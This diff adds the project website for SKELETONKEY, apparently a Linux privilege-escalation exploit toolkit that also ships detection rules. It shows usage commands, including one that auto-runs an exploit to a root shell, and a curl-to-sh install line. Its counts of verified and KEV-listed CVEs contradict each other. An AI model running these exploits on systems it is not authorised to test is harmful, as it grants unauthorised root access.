+      document.querySelectorAll('.reveal').forEach((el) => el.classList.add('in'));
+      // also fire one-shot animations immediately
+      countAllStats();
+      const explainEl = document.getElementById('explain-output');
+      if (explainEl) playExplain(explainEl);
+      return;
+    }
+
+    const obs = new IntersectionObserver((entries) => {
+      entries.forEach((e) => {
+        if (e.isIntersecting) {
+          e.target.classList.add('in');
+          // fire one-shot effects when the right section becomes visible
+          if (e.target.id === 'explain') {
+            const out = e.target.querySelector('#explain-output');
+            if (out && !out.dataset.played) {
+              out.dataset.played = '1';
+              playExplain(out);
+            }
+          }
+          obs.unobserve(e.target);
+        }
+      });
+    }, { threshold: 0.15 });
+
+    document.querySelectorAll('.reveal').forEach((el) => obs.observe(el));
+  }
+
+  function countAllStats() {
+    document.querySelectorAll('.stat-chip .num').forEach(countUp);
+  }
+
+  /* fire the stats count-up as soon as the hero shows */
+  function initStatsCountUp() {
+    if (!('IntersectionObserver' in window) || reduceMotion) {
+      countAllStats();
+      return;
+    }
+    const row = document.getElementById('stats-row');
+    if (!row) return;
+    const o = new IntersectionObserver((es) => {
+      if (es[0].isIntersecting) {
+        countAllStats();
+        o.disconnect();
+      }
+    });
+    o.observe(row);
+  }
+
+  /* ============================================================
+   * boot
+   * ============================================================ */
+  document.addEventListener('DOMContentLoaded', () => {
+    typeInstall();
+    initTabs();
+    initReveal();
+    initStatsCountUp();
+  });
+})();
@@ -0,0 +1,609 @@
+<!DOCTYPE html>
+<html lang="en">
+<head>
+<meta charset="UTF-8">
+<meta name="viewport" content="width=device-width, initial-scale=1.0">
+<title>SKELETONKEY — Linux LPE corpus, VM-verified, SOC-ready detection</title>
+<meta name="description" content="One binary. 39 Linux privilege-escalation modules from 2016 to 2026. 28 of 34 CVEs empirically verified in real Linux VMs. 10 KEV-listed. 151 detection rules across auditd/sigma/yara/falco. MITRE ATT&CK and CWE annotated. --explain gives operator briefings.">
+<meta property="og:title" content="SKELETONKEY — Linux LPE corpus, VM-verified">
+<meta property="og:description" content="39 Linux LPE modules; 28 of 34 CVEs empirically verified in real VMs. 151 detection rules. ATT&CK + CWE + KEV annotated.">
+<meta property="og:type" content="website">
+<meta property="og:url" content="https://karazajac.github.io/SKELETONKEY/">
+<meta property="og:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
+<meta property="og:image:width" content="1200">
+<meta property="og:image:height" content="630">
+<meta name="twitter:card" content="summary_large_image">
+<meta name="twitter:image" content="https://karazajac.github.io/SKELETONKEY/og.png">
+<meta name="theme-color" content="#0a0a14">
+
+<link rel="preconnect" href="https://fonts.googleapis.com">
+<link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
+<link href="https://fonts.googleapis.com/css2?family=Inter:wght@400;500;600;700;800&family=JetBrains+Mono:wght@400;500;700&family=Space+Grotesk:wght@500;700&display=swap" rel="stylesheet">
+
+<link rel="stylesheet" href="style.css">
+</head>
+<body>
+
+<!-- gradient mesh background, animated, fixed behind content -->
+<div class="bg-mesh" aria-hidden="true">
+  <div class="mesh-blob mesh-blob-1"></div>
+  <div class="mesh-blob mesh-blob-2"></div>
+  <div class="mesh-blob mesh-blob-3"></div>
+</div>
+
+<nav class="nav">
+  <div class="container nav-inner">
+    <a class="nav-brand" href="#">
+      <span class="nav-mark" aria-hidden="true">◆</span>
+      SKELETONKEY
+    </a>
+    <div class="nav-links">
+      <a href="#corpus">Corpus</a>
+      <a href="#explain">--explain</a>
+      <a href="#detection">Detection</a>
+      <a href="#quickstart">Quickstart</a>
+      <a class="nav-github" href="https://github.com/KaraZajac/SKELETONKEY" aria-label="GitHub">
+        <svg height="18" viewBox="0 0 16 16" width="18" fill="currentColor" aria-hidden="true">
+          <path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/>
+        </svg>
+      </a>
+    </div>
+  </div>
+</nav>
+
+<!-- ──────────────── HERO ──────────────── -->
+<header class="hero">
+  <div class="container hero-inner">
+    <div class="hero-eyebrow">
+      <span class="dot dot-pulse"></span>
+      v0.9.3 — released 2026-05-24
+    </div>
+    <h1 class="hero-title">
+      <span class="display-wordmark">SKELETONKEY</span>
+    </h1>
+    <p class="hero-tag">
+      One binary. <strong>39 Linux LPE modules</strong> covering 34 CVEs —
+      <strong>every year 2016 → 2026</strong>. 28 of 34 confirmed against
+      real Linux kernels in VMs. SOC-ready detection rules in four SIEM
+      formats. MITRE ATT&amp;CK + CWE + CISA KEV annotated.
+      <span class="hero-tag-pop">--explain gives a one-page operator briefing per CVE.</span>
+    </p>
+
+    <div class="install-block">
+      <div class="install-bar">
+        <span class="install-dots" aria-hidden="true">
+          <i></i><i></i><i></i>
+        </span>
+        <span class="install-title">terminal</span>
+        <button class="copy" onclick="copyInstall(this)" aria-label="Copy install command">copy</button>
+      </div>
+      <pre id="install-cmd"><span class="prompt">$</span> <span id="install-typed"></span><span class="cursor" id="install-cursor">▋</span></pre>
+    </div>
+
+    <div class="stats-row" id="stats-row">
+      <div class="stat-chip"><span class="num" data-target="39">0</span><span>modules</span></div>
+      <div class="stat-chip stat-vfy"><span class="num" data-target="28">0</span><span>✓ VM-verified</span></div>
+      <div class="stat-chip stat-kev"><span class="num" data-target="12">0</span><span>★ in CISA KEV</span></div>
+      <div class="stat-chip"><span class="num" data-target="151">0</span><span>detection rules</span></div>
+    </div>
+
+    <div class="cta-row">
+      <a class="btn btn-primary" href="https://github.com/KaraZajac/SKELETONKEY/releases/latest">
+        ↓ Latest release
+      </a>
+      <a class="btn" href="#explain">See <code>--explain</code> in action</a>
+      <a class="btn btn-ghost" href="https://github.com/KaraZajac/SKELETONKEY">
+        <svg height="16" viewBox="0 0 16 16" width="16" fill="currentColor"><path d="M8 0C3.58 0 0 3.58 0 8c0 3.54 2.29 6.53 5.47 7.59.4.07.55-.17.55-.38 0-.19-.01-.82-.01-1.49-2.01.37-2.53-.49-2.69-.94-.09-.23-.48-.94-.82-1.13-.28-.15-.68-.52-.01-.53.63-.01 1.08.58 1.23.82.72 1.21 1.87.87 2.33.66.07-.52.28-.87.51-1.07-1.78-.2-3.64-.89-3.64-3.95 0-.87.31-1.59.82-2.15-.08-.2-.36-1.02.08-2.12 0 0 .67-.21 2.2.82.64-.18 1.32-.27 2-.27.68 0 1.36.09 2 .27 1.53-1.04 2.2-.82 2.2-.82.44 1.1.16 1.92.08 2.12.51.56.82 1.27.82 2.15 0 3.07-1.87 3.75-3.65 3.95.29.25.54.73.54 1.48 0 1.07-.01 1.93-.01 2.2 0 .21.15.46.55.38A8.013 8.013 0 0 0 16 8c0-4.42-3.58-8-8-8z"/></svg>
+        Source on GitHub
+      </a>
+    </div>
+
+    <p class="hero-warn">Authorized testing only. See <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md">ETHICS.md</a>.</p>
+  </div>
+</header>
+
+<!-- ──────────────── TRUST STRIP ──────────────── -->
+<section class="trust-strip">
+  <div class="container">
+    <div class="trust-row">
+      <span class="trust-label">Grounded in authoritative sources</span>
+      <ul class="trust-items">
+        <li>CISA KEV catalog</li>
+        <li>NVD CVE API</li>
+        <li>MITRE ATT&amp;CK</li>
+        <li>kernel.org stable tree</li>
+        <li>Debian Security Tracker</li>
+        <li>NIST CWE</li>
+      </ul>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── --EXPLAIN SHOWCASE ──────────────── -->
+<section id="explain" class="section section-feature reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">flagship feature</span>
+      <h2>One command. Complete briefing.</h2>
+      <p class="lead">
+        <code>skeletonkey --explain &lt;module&gt;</code> renders the page every
+        team needs: CVE / CWE / MITRE ATT&amp;CK / CISA KEV status, host
+        fingerprint, live detect() trace with verdict, OPSEC footprint, and
+        the detection-rule coverage matrix. Triage tickets and SOC handoffs
+        in one paste.
+      </p>
+    </div>
+
+    <div class="terminal-shell">
+      <div class="terminal-bar">
+        <span class="install-dots" aria-hidden="true"><i></i><i></i><i></i></span>
+        <span class="install-title">skk-host ~ $</span>
+      </div>
+      <pre class="terminal-body" id="explain-output"></pre>
+    </div>
+
+    <div class="explain-annotations">
+      <div class="annotation">
+        <span class="anno-num">1</span>
+        <div>
+          <strong>Triage metadata in the header</strong>
+          <p>CWE class, MITRE ATT&amp;CK technique, CISA KEV status with
+          date_added. Fed from <code>tools/refresh-cve-metadata.py</code>
+          which pulls fresh from federal data sources.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">2</span>
+        <div>
+          <strong>Live host fingerprint</strong>
+          <p>Cached once at startup by <code>core/host.c</code>. Every
+          module sees the same kernel / arch / distro / userns / apparmor
+          / selinux / lockdown picture.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">3</span>
+        <div>
+          <strong>Real detect() trace</strong>
+          <p>The verbose stderr of the module's own probe — each gate
+          fires, each kernel_range entry checked, each verdict justified.
+          No more black-box "VULNERABLE" outputs.</p>
+        </div>
+      </div>
+      <div class="annotation">
+        <span class="anno-num">4</span>
+        <div>
+          <strong>OPSEC footprint</strong>
+          <p>Per-exploit description of what the SOC would see if this
+          fired: file artifacts, dmesg signatures, syscall observables,
+          network activity, cleanup behavior.</p>
+        </div>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── BENTO FEATURES ──────────────── -->
+<section class="section section-bento reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">capabilities</span>
+      <h2>Built for every side of the desk</h2>
+    </div>
+
+    <div class="bento">
+      <article class="bento-card bento-lg">
+        <div class="bento-icon">⚡</div>
+        <h3>Auto-pick the safest exploit</h3>
+        <p>
+          <code>--auto</code> ranks vulnerable modules by stability
+          (structural escapes &gt; page-cache writes &gt; userspace races
+          &gt; kernel races) and runs the safest one. Never crashes a
+          production box looking for root.
+        </p>
+        <pre class="bento-code">$ skeletonkey --auto --i-know
+[*] 3 vulnerable; safest is 'pwnkit' (rank 100)
+[*] launching --exploit pwnkit...
+# id
+uid=0(root) gid=0(root)</pre>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🛡</div>
+        <h3>151 detection rules</h3>
+        <p>
+          auditd · sigma · yara · falco. One command emits the corpus for
+          your SIEM. Each rule grounded in the module's own syscalls.
+        </p>
+        <div class="rule-cov">
+          <div class="rule-row"><span>auditd</span><span class="rule-bar"><i style="width:96.7%"></i></span><span>30/31</span></div>
+          <div class="rule-row"><span>sigma</span><span class="rule-bar"><i style="width:100%"></i></span><span>31/31</span></div>
+          <div class="rule-row"><span>yara</span><span class="rule-bar"><i style="width:90.3%"></i></span><span>28/31</span></div>
+          <div class="rule-row"><span>falco</span><span class="rule-bar"><i style="width:96.7%"></i></span><span>30/31</span></div>
+        </div>
+      </article>
+
+      <article class="bento-card bento-kev">
+        <div class="bento-icon">★</div>
+        <h3>CISA KEV prioritized</h3>
+        <p>
+          12 of 34 CVEs in the corpus are in CISA's Known Exploited
+          Vulnerabilities catalog — actively exploited in the wild.
+          Refreshed on demand via <code>tools/refresh-cve-metadata.py</code>.
+        </p>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🧬</div>
+        <h3>OPSEC notes per exploit</h3>
+        <p>
+          Each module ships a runtime-footprint paragraph: files, dmesg,
+          syscall observables, network, persistence. The inverse of the
+          detection rules — what an attacker would leave behind on
+          <em>your</em> host.
+        </p>
+      </article>
+
+      <article class="bento-card bento-lg">
+        <div class="bento-icon">🎯</div>
+        <h3>One host fingerprint, every module</h3>
+        <p>
+          <code>core/host.c</code> probes kernel / arch / distro / userns /
+          apparmor / selinux / lockdown / sudo version / polkit version
+          <em>once</em> at startup. Every <code>detect()</code> reads the
+          same cached snapshot, so verdicts stay coherent across the
+          corpus.
+        </p>
+        <pre class="bento-code">struct skeletonkey_host {
+    struct kernel_version kernel;
+    char arch[32], distro_id[64];
+    bool unprivileged_userns_allowed;
+    bool apparmor_restrict_userns;
+    bool kpti_enabled, selinux_enforcing;
+    char meltdown_mitigation[64];
+    char sudo_version[64], polkit_version[64];
+    ...
+};</pre>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">📡</div>
+        <h3>JSON for pipelines</h3>
+        <p>
+          <code>--scan --json</code> emits a stable schema (see
+          <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md">JSON_SCHEMA.md</a>)
+          with triage metadata, opsec notes, and rule coverage embedded.
+          Ready for Splunk / Elastic / Sentinel ingest.
+        </p>
+      </article>
+
+      <article class="bento-card">
+        <div class="bento-icon">🔒</div>
+        <h3>No SaaS. No telemetry.</h3>
+        <p>
+          One static binary. No phone-home, no analytics, no cloud
+          accounts. Reads <code>/proc</code> + <code>/sys</code>, runs the
+          probe, exits. JSON or plain text — your pipeline owns the data.
+        </p>
+      </article>
+
+      <article class="bento-card bento-vfy">
+        <div class="bento-icon">✓</div>
+        <h3>22 modules empirically verified</h3>
+        <p>
+          <code>tools/verify-vm/</code> spins up known-vulnerable
+          kernels (stock distro + mainline from kernel.ubuntu.com), runs
+          <code>--explain --active</code> per module, and records the
+          verdict. <strong>28 of 34 CVEs</strong> confirmed against
+          real Linux across Ubuntu 18.04 / 20.04 / 22.04 + Debian 11 / 12
+          + mainline 5.4.0-26 / 5.15.5 / 6.1.10 / 6.19.7. Records baked into the binary;
+          <code>--list</code> shows ✓ per module.
+        </p>
+      </article>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── MODULE CORPUS ──────────────── -->
+<section id="corpus" class="section reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">corpus</span>
+      <h2>34 CVEs across 10 years. ★ = actively exploited (CISA KEV).</h2>
+    </div>
+
+    <h3 class="corpus-h" data-color="green">
+      <span class="corpus-dot green"></span>
+      Lands root on a vulnerable host
+      <span class="corpus-h-sub">structural escapes + page-cache writes; no per-kernel offsets needed</span>
+    </h3>
+    <div class="pills">
+      <span class="pill green">copy_fail</span>
+      <span class="pill green">copy_fail_gcm</span>
+      <span class="pill green">dirty_frag_esp</span>
+      <span class="pill green">dirty_frag_esp6</span>
+      <span class="pill green">dirty_frag_rxrpc</span>
+      <span class="pill green kev">★ dirty_pipe</span>
+      <span class="pill green kev">★ dirty_cow</span>
+      <span class="pill green kev">★ pwnkit</span>
+      <span class="pill green kev">★ overlayfs</span>
+      <span class="pill green kev">★ overlayfs_setuid</span>
+      <span class="pill green">cgroup_release_agent</span>
+      <span class="pill green kev">★ ptrace_traceme</span>
+      <span class="pill green">sudoedit_editor</span>
+      <span class="pill green">entrybleed</span>
+    </div>
+
+    <h3 class="corpus-h" data-color="yellow">
+      <span class="corpus-dot yellow"></span>
+      Fires kernel primitive · opt-in <code>--full-chain</code>
+      <span class="corpus-h-sub">honest <code>EXPLOIT_FAIL</code> default; <code>--full-chain</code> runs the shared modprobe_path finisher</span>
+    </h3>
+    <div class="pills">
+      <span class="pill yellow kev">★ nf_tables</span>
+      <span class="pill yellow">nft_set_uaf</span>
+      <span class="pill yellow">nft_fwd_dup</span>
+      <span class="pill yellow">nft_payload</span>
+      <span class="pill yellow kev">★ netfilter_xtcompat</span>
+      <span class="pill yellow">af_packet</span>
+      <span class="pill yellow">af_packet2</span>
+      <span class="pill yellow">af_unix_gc</span>
+      <span class="pill yellow">cls_route4</span>
+      <span class="pill yellow kev">★ fuse_legacy</span>
+      <span class="pill yellow">stackrot</span>
+      <span class="pill yellow kev">★ sudo_samedit</span>
+      <span class="pill yellow">sequoia</span>
+      <span class="pill yellow">vmwgfx</span>
+    </div>
+
+    <p class="corpus-foot">
+      Full inventory with kernel ranges, mitigations, and detection
+      coverage:
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md">CVES.md</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/KEV_CROSSREF.md">KEV cross-reference</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/CVE_METADATA.json">CVE_METADATA.json</a>
+    </p>
+  </div>
+</section>
+
+<!-- ──────────────── AUDIENCE ──────────────── -->
+<section class="section section-audience reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">who it's for</span>
+      <h2>Same project. Both sides of the engagement.</h2>
+    </div>
+
+    <div class="audience-grid">
+      <div class="audience-card audience-red">
+        <div class="audience-icon">🔴</div>
+        <h3>Red team / pentesters</h3>
+        <p>
+          <code>--auto</code> picks the safest exploit and runs it. Honest
+          scope reporting — never claims root it didn't actually get.
+          Per-exploit OPSEC notes tell you what telemetry you'll leave.
+          No more curating stale PoC repos.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/README.md" class="audience-link">Walkthrough →</a>
+      </div>
+      <div class="audience-card audience-blue">
+        <div class="audience-icon">🔵</div>
+        <h3>Blue team / SOC</h3>
+        <p>
+          One command ships SIEM coverage for the entire corpus.
+          <code>--explain</code> renders a triage briefing per CVE with
+          CWE / ATT&amp;CK / KEV / OPSEC — paste into the ticket.
+          KEV-prioritized so you fix what attackers are already using.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md" class="audience-link">Playbook →</a>
+      </div>
+      <div class="audience-card audience-gray">
+        <div class="audience-icon">🛠</div>
+        <h3>Sysadmins / IT</h3>
+        <p>
+          <code>--scan</code> works without sudo. JSON output for CI
+          gates. Fleet-scan helper bundled. Compatible with everything
+          back to glibc 2.17 via the static-musl binary. No SaaS,
+          no analytics, no cloud accounts.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md" class="audience-link">JSON schema →</a>
+      </div>
+      <div class="audience-card audience-purple">
+        <div class="audience-icon">🎓</div>
+        <h3>Researchers / CTF</h3>
+        <p>
+          34 CVEs, 10-year span, each with the original PoC author
+          credited and the kernel-range citation auditable.
+          <code>--explain</code> shows the reasoning chain; detection
+          rules let you practice both sides. Source is the documentation.
+        </p>
+        <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md" class="audience-link">Architecture →</a>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── HONESTY CALLOUT ──────────────── -->
+<section class="section section-callout reveal">
+  <div class="container">
+    <div class="callout">
+      <div class="callout-mark">✓</div>
+      <div>
+        <h3>The verified-vs-claimed bar</h3>
+        <p>
+          Most public PoC repos hardcode offsets for one kernel build and
+          silently break elsewhere. <strong>SKELETONKEY refuses to ship
+          fabricated offsets.</strong> The shared <code>--full-chain</code>
+          finisher returns <code>EXPLOIT_OK</code> only when a setuid
+          bash sentinel file <em>actually appears</em>. Modules with a
+          primitive but no portable cred-overwrite chain default to
+          firing the primitive + grooming the slab + recording a witness,
+          then return <code>EXPLOIT_FAIL</code> with diagnostic.
+          Operators populate the offset table once per kernel via
+          <code>--dump-offsets</code> and upstream the entry via PR.
+        </p>
+      </div>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── QUICKSTART ──────────────── -->
+<section id="quickstart" class="section reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">quickstart</span>
+      <h2>Five commands.</h2>
+    </div>
+
+    <div class="tabs" role="tablist">
+      <button class="tab active" data-tab="install" role="tab">install</button>
+      <button class="tab" data-tab="scan" role="tab">scan</button>
+      <button class="tab" data-tab="explain" role="tab">explain</button>
+      <button class="tab" data-tab="auto" role="tab">auto</button>
+      <button class="tab" data-tab="detect" role="tab">detect-rules</button>
+    </div>
+
+    <div class="tab-panel active" data-tab="install">
+<pre class="code"><span class="cmt"># install (x86_64 / arm64; checksum-verified)</span>
+<span class="prompt">$</span> curl -sSL https://github.com/KaraZajac/SKELETONKEY/releases/latest/download/install.sh | sh
+<span class="cmt"># default is the musl-static x86_64 binary — works back to glibc 2.17</span></pre>
+    </div>
+    <div class="tab-panel" data-tab="scan">
+<pre class="code"><span class="cmt"># inventory — no sudo needed</span>
+<span class="prompt">$</span> skeletonkey --scan
+<span class="cmt"># or machine-readable for a SIEM</span>
+<span class="prompt">$</span> skeletonkey --scan --json | jq '.findings[] | select(.verdict == "VULNERABLE")'</pre>
+    </div>
+    <div class="tab-panel" data-tab="explain">
+<pre class="code"><span class="cmt"># one-page operator briefing for a single CVE</span>
+<span class="prompt">$</span> skeletonkey --explain nf_tables
+<span class="cmt"># shows CVE/CWE/ATT&amp;CK/KEV header, host fingerprint, live trace,</span>
+<span class="cmt"># verdict, OPSEC footprint, detection coverage. Paste into your ticket.</span></pre>
+    </div>
+    <div class="tab-panel" data-tab="auto">
+<pre class="code"><span class="cmt"># pick the safest exploit and run it</span>
+<span class="prompt">$</span> skeletonkey --auto --i-know
+<span class="cmt"># --dry-run for "what would it do?" without launching</span>
+<span class="prompt">$</span> skeletonkey --auto --dry-run</pre>
+    </div>
+    <div class="tab-panel" data-tab="detect">
+<pre class="code"><span class="cmt"># deploy SIEM coverage (needs sudo to write to /etc/audit/rules.d/)</span>
+<span class="prompt">$</span> skeletonkey --detect-rules --format=auditd | sudo tee /etc/audit/rules.d/99-skeletonkey.rules
+<span class="prompt">$</span> sudo augenrules --load
+
+<span class="cmt"># or in YAML for falco / sigma / yara</span>
+<span class="prompt">$</span> skeletonkey --detect-rules --format=falco &gt; /etc/falco/skeletonkey_rules.yaml</pre>
+    </div>
+  </div>
+</section>
+
+<!-- ──────────────── ROADMAP / TIMELINE ──────────────── -->
+<section class="section section-timeline reveal">
+  <div class="container">
+    <div class="section-head">
+      <span class="section-tag">where we are</span>
+      <h2>Recently shipped · in flight · next.</h2>
+    </div>
+
+    <div class="timeline">
+      <div class="tl-col tl-shipped">
+        <div class="tl-tag">shipped</div>
+        <ul>
+          <li><strong>28 of 34 CVEs empirically verified</strong> in real Linux VMs</li>
+          <li><strong>kernel.ubuntu.com/mainline/</strong> kernel fetch path — unblocks pin-not-in-apt targets</li>
+          <li>Per-module <code>verified_on[]</code> table baked into the binary</li>
+          <li><strong>--explain mode</strong> — one-page operator briefing per CVE</li>
+          <li><strong>OPSEC notes</strong> — per-module runtime footprint</li>
+          <li><strong>CISA KEV + NVD CWE + MITRE ATT&amp;CK</strong> metadata pipeline</li>
+          <li>151 detection rules across all four SIEM formats</li>
+          <li><code>core/host.c</code> shared host-fingerprint refactor</li>
+          <li>88-test harness (kernel_range + detect integration)</li>
+        </ul>
+      </div>
+      <div class="tl-col tl-active">
+        <div class="tl-tag">in flight</div>
+        <ul>
+          <li>9 deferred TOO_TIGHT kernel-range drift findings</li>
+          <li>PackageKit provisioner so pack2theroot can hit the VULNERABLE path</li>
+          <li>Custom Vagrant box for kernels ≤ 4.4 (unblock dirty_cow verification)</li>
+        </ul>
+      </div>
+      <div class="tl-col tl-next">
+        <div class="tl-tag">next</div>
+        <ul>
+          <li>arm64 musl-static binary (Raspberry-Pi-class deployments)</li>
+          <li>Mass-fleet scan aggregator → heat-map dashboard</li>
+          <li>SIEM query templates (Splunk SPL, Elastic KQL, Sentinel KQL)</li>
+          <li>CWE / ATT&amp;CK filter for <code>--scan --json</code></li>
+          <li>CI hardening: clang-tidy, scan-build, drift-check job</li>
+        </ul>
+      </div>
+    </div>
+
+    <p class="tl-foot">
+      Full roadmap and contribution guide:
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md">ROADMAP.md</a>
+      ·
+      <a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CONTRIBUTING.md">CONTRIBUTING.md</a>
+    </p>
+  </div>
+</section>
+
+<!-- ──────────────── FOOTER ──────────────── -->
+<footer class="footer">
+  <div class="container footer-inner">
+    <div class="footer-col">
+      <div class="footer-brand">
+        <span class="nav-mark" aria-hidden="true">◆</span>
+        SKELETONKEY
+      </div>
+      <p class="footer-tag">
+        Curated Linux LPE corpus with SOC-ready detection rules. One
+        binary, no SaaS, no telemetry. MIT licensed.
+      </p>
+    </div>
+    <div class="footer-col">
+      <h4>Project</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY">Source</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/releases">Releases</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CVES.md">CVE inventory</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/ROADMAP.md">Roadmap</a></li>
+      </ul>
+    </div>
+    <div class="footer-col">
+      <h4>Docs</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ARCHITECTURE.md">Architecture</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DETECTION_PLAYBOOK.md">Detection playbook</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/JSON_SCHEMA.md">JSON schema</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/OFFSETS.md">Offsets</a></li>
+      </ul>
+    </div>
+    <div class="footer-col">
+      <h4>Ethics</h4>
+      <ul>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/ETHICS.md">ETHICS.md</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/docs/DEFENDERS.md">For defenders</a></li>
+        <li><a href="https://github.com/KaraZajac/SKELETONKEY/blob/main/CONTRIBUTING.md">Contribute</a></li>
+      </ul>
+    </div>
+  </div>
+  <div class="container footer-bottom">
+    <p>
+      Each module credits the original CVE reporter and PoC author in its
+      <code>NOTICE.md</code>. The research credit belongs to the people
+      who found the bugs.
+    </p>
+    <p class="footer-meta">
+      v0.9.3 · MIT · <a href="https://github.com/KaraZajac/SKELETONKEY">github.com/KaraZajac/SKELETONKEY</a>
+    </p>
+  </div>
+</footer>
+
+<script src="app.js" defer></script>
+
+</body>
+</html>
@@ -0,0 +1,85 @@
+<?xml version="1.0" encoding="UTF-8"?>
+<svg xmlns="http://www.w3.org/2000/svg" width="1200" height="630" viewBox="0 0 1200 630">
+  <defs>
+    <linearGradient id="bg" x1="0" y1="0" x2="1" y2="1">
+      <stop offset="0" stop-color="#07070d"/>
+      <stop offset="1" stop-color="#0c0c16"/>
+    </linearGradient>
+    <linearGradient id="brand" x1="0" y1="0" x2="1" y2="0">
+      <stop offset="0" stop-color="#10b981"/>
+      <stop offset="1" stop-color="#06b6d4"/>
+    </linearGradient>
+    <radialGradient id="glow1" cx="0.2" cy="0.3" r="0.6">
+      <stop offset="0" stop-color="#10b981" stop-opacity="0.18"/>
+      <stop offset="1" stop-color="#10b981" stop-opacity="0"/>
+    </radialGradient>
+    <radialGradient id="glow2" cx="0.85" cy="0.8" r="0.5">
+      <stop offset="0" stop-color="#a855f7" stop-opacity="0.16"/>
+      <stop offset="1" stop-color="#a855f7" stop-opacity="0"/>
+    </radialGradient>
+  </defs>
+
+  <!-- backgrounds -->
+  <rect width="1200" height="630" fill="url(#bg)"/>
+  <rect width="1200" height="630" fill="url(#glow1)"/>
+  <rect width="1200" height="630" fill="url(#glow2)"/>
+
+  <!-- diamond mark -->
+  <g transform="translate(80,140)">
+    <rect x="0" y="0" width="36" height="36" transform="rotate(45 18 18)" fill="url(#brand)"/>
+  </g>
+
+  <!-- wordmark -->
+  <text x="142" y="170" font-family="'Space Grotesk','Inter',sans-serif" font-weight="700" font-size="68" fill="#ecedf7" letter-spacing="-2">
+    SKELETONKEY
+  </text>
+
+  <!-- tagline -->
+  <text x="80" y="240" font-family="'Inter',sans-serif" font-size="30" fill="#c5c5d3" font-weight="500">
+    Curated Linux LPE corpus.
+  </text>
+  <text x="80" y="278" font-family="'Inter',sans-serif" font-size="30" fill="#c5c5d3" font-weight="500">
+    Every year 2016 → 2026. 28 of 34 verified.
+  </text>
+
+  <!-- stat chips -->
+  <g transform="translate(80,360)">
+    <!-- 39 modules -->
+    <rect x="0" y="0" width="190" height="58" rx="29" fill="#161628" stroke="#25253c"/>
+    <text x="28" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ecedf7">39</text>
+    <text x="64" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">modules</text>
+
+    <!-- 28 VM-verified -->
+    <rect x="206" y="0" width="240" height="58" rx="29" fill="#161628" stroke="#10b981" stroke-opacity="0.5"/>
+    <text x="234" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#34d399">28</text>
+    <text x="270" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">✓ VM-verified</text>
+
+    <!-- 12 KEV -->
+    <rect x="482" y="0" width="218" height="58" rx="29" fill="#161628" stroke="#ef4444" stroke-opacity="0.4"/>
+    <text x="510" y="38" font-family="'JetBrains Mono',monospace" font-weight="700" font-size="22" fill="#ef4444">12</text>
+    <text x="546" y="37" font-family="'Inter',sans-serif" font-size="16" fill="#8a8a9d">★ in CISA KEV</text>
+
+    <!-- 151 rules -->
+    <rect x="736" y="0" width="232" height="58" rx="29" fill="#161628" stroke="#25253c"/>
